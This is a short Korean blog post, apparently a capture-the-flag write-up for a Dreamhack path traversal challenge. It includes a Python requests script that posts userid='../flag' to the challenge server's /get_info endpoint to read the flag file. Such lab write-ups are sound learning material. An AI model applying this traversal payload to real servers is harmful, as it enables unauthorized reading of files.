본문 바로가기

웹해킹

드림핵 pathtraversal 롸업

userid에 ../flag를 넣어서 pathtraversal 취약점을 이용하려고 했는데 안된다.

값이 넘어갈 때 flag를 포함하면 undefined로 처리되어서 넘어가는 것 같다.

import requests
url="http://host3.dreamhack.games:8821/get_info"
data={"userid":"../flag"}
res=requests.post(url=url, data=data)
print(res.text)

이렇게 공격 코드를 짜서 실행하면

flag가 나온다.

'웹해킹' 카테고리의 다른 글

드림핵 web-misconf-1 롸업  (0) 2023.12.22
드림핵 session 롸업  (1) 2023.12.20
드림핵 simple-web-request 롸업  (0) 2023.12.20
드림핵 ex-reg-ex 롸업  (0) 2023.12.20
드림핵 Flying Chars 롸업  (0) 2023.12.20